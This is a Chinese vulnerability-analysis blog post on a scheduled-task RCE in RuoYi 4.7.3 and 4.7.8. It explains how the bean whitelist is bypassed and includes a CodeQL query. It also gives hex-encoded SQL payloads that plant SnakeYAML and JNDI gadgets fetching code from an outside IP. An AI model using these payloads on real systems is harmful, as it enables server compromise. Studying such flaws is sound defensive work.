【代码审计】RuoYi-4.7.3&4.7.8 定时任务RCE 漏洞分析

Z3r4y2025-11-14 1:02

目录

4.7.3

4.7.8

4.7.3

关注/monitor/job/add

做了黑名单和白名单

看一下定时任务是怎么执行的

在getDeclaredMethod获取方法后,并没有执行setAccessible(true),所以只能拿public方法

再看下isValidClassName的实现

其实就是,若非全限定类名,则从spring容器中取出对象;若是全限定类名,则利用反射调用无参构造函数方法创建对象

此逻辑在白名单处也有,代码仅仅对全限定类名(class)进行了检测,但没有对spring容器中的对象进行白名单检测。

则思路为,在spring容器中找到一个不在黑名单中的Bean

或者在白名单内找一个不在黑名单且符合要求的类

交给codeql跑一下

复制代码 
codeql database create ruoyi-database --language=java --command='mvn clean package -f "pom.xml"'

import java

from Method m

where
    m.getDeclaringType().getAConstructor().hasNoParameters() 
    m.isPublic()
    and m.getAParamType() instanceof TypeString
    and m.getDeclaringType().getPackage().getName().matches("com.ruoyi%")
    and not m.isAbstract()
    and not m.getDeclaringType().getPackage().getName().matches("com.ruoyi.common.utils.file%")
    and not m.getName().matches("get%")
    and not m.getName().matches("is%")
    and not m.getName().matches("has%")

select m.getDeclaringType().getPackage().getName(),m.getDeclaringType(),m

关注到com.ruoyi.generator.service.impl.GenTableServiceImpl#createTable

搜一下xml

可任意sql语句执行

复制代码 
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a61... WHERE job_id = 1;')

这样就绕过了新建任务的Waf限制,可通过直接修改数据库来修改计划任务的内容

复制代码 
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6f72672e79616d6c2e736e616b6579616d6c2e59616d6c2e6c6f6164282721216a617661782e7363726970742e536372697074456e67696e654d616e61676572205b21216a6176612e6e65742e55524c436c6173734c6f61646572205b5b21216a6176612e6e65742e55524c205b22687474703a2f2f382e3133382e33382e38313a313333382f79616d6c2d7061796c6f61642e6a6172225d5d5d5d2729 WHERE job_id = 1;')

成功修改

弹出计算器

4.7.8

和4.7.3最大的区别在于白名单的处理逻辑

当调用Spring Bean的时候也要走一下白名单和黑名单

com.ruoyi.generator.service.impl.GenTableServiceImpl依然能过该版本的黑白名单

但在4.7.9版本被修了(

接着打就行,但换种打法

javax.naming.InitialContext#lookup

复制代码 
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f382e3133382e33382e38313a313333382f237375696269616e2729 WHERE job_id = 1;')

成功修改

其他也都可以,不一一赘述了

javax.naming.InitialContext#lookup

org.yaml.snakeyaml.Yaml#load

org.springframework.jndi.JndiLocatorDelegate#lookup

org.springframework.jdbc.datasource.lookup.JndiDataSourceLookup#getDataSource

org.apache.velocity.runtime.RuntimeInstance#init

相关推荐
用户3521802454757 小时前
当 Prompt 学会"热更新":Spring Boot × Nacos3 AI 实战
java·spring boot·ai编程
东坡白菜10 小时前
破局全栈:一个前端开发的Java入门实战记录(1)
java·全栈
唐青枫10 小时前
Java Tomcat 实战指南:从 Servlet 容器到 Spring Boot 部署
java
wsaaaqqq11 小时前
roudan:自由选择实体、灵活操作数据、快速写入数据库的 Java 框架
java
plainGeekDev14 小时前
null 判断 → Kotlin 可空类型
android·java·kotlin
糖拌西瓜皮14 小时前
Java开发者视角:深入理解Node.js异步编程模型
java·后端·node.js
plainGeekDev14 小时前
getter/setter → Kotlin 属性
android·java·kotlin
一线大码15 小时前
Smart-Doc 的简单使用
java·后端·restful
MacroZheng16 小时前
Claude Code官方桌面端正式发布,夯爆了!
java·人工智能·后端
热门推荐
012026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf03【AI】2026 年具身智能模型和世界模型总结04GitHub 镜像站点052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?062026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?07Codex 下载安装指南:Windows 和 macOS 官方版下载08上线仅72小时被强制下架:Claude Fable 5 的短命09AI科技热点日报 | 2026年6月1日10HTTP 与 HTTPS 的区别:从原理到实战详解